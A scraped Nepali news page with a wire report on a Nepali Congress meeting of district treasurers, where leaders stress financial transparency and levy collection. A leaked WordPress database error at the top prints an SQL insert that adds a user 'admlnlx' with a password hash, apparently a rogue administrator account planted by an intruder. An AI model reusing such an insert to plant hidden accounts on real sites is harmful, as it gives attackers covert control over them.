WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B9/cx3wxgcXMIIdKd9t8eTnPX1BCDG0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-25 07:37:30', '', 'admlnlx', 'admlnlx')
काठमाडौँ,पुस १० –
नेपाली काँग्रेसका नेता प्रकाशमान सिंहले नेपाली काँग्रेस जिल्ला कोषाध्यक्षहरूको प्रथम ऐतिहासिक राष्ट्रिय सम्मेलनले पार्टीभित्रको आर्थिक पारदर्र्शितामा ठूलो सहयोग पुगेको बताउनुभएको छ ।
पार्टीको कोषाध्यक्षको राष्ट्रिय सम्मेलनमा भागलिन राजधानी आउनुभएका कोषाध्यक्षहरूलाई आज आफ्नै निवास चाक्सीबारीमा चियापान कार्यक्रमको आयोजना गरी नेता सिंहले पार्टीभित्र उठाउँदै आएको लेभीलाई प्रक्रियागत ढङ्गले अगाडि बढाउन आग्रह गर्नुभयो । उहाँले भन्नुभयो, “पार्टीलाई बलियो बनाउनका लागि आर्थिक रूपमा सबल र सक्षम हुनुपर्छ ।”
पार्टीका पूर्वमहामन्त्रीसमेत रहनुभएका नेता सिंहले आर्थिक स्रोत सङ्कलनलाई सही तरिकाले हिसाबकिताब राख्नुपर्नेमा जोड दिनुभयो । नेता सिंहले जिल्लामा गएर सङ्गठन निर्माण र स्थानीय निर्वाचनको तयारीमा जुट्न निर्देशन दिनुभयो ।
उद्योग राज्यमन्त्री कञ्चनचन्द्र वादेले कोषाध्यक्षको पहिलो राष्ट्रिय भेला गरेर पार्टीले ऐतिहासिक काम गरेको उल्लेख गर्नुभयो । उहाँले पार्टीको सदस्यता प्रणालीलाई वैज्ञानिक, व्यावहारिक र पारदर्शी बनाउन जिल्ला कोषाध्यक्षहरूलाई आग्रह गर्नुभयो ।
सो कार्यक्रममा नेपाली काँग्रेस जिल्लाका कोषाध्यक्षहरू, नेता तथा कार्यकर्ताको सहभागिता रहेको थियो । – रासस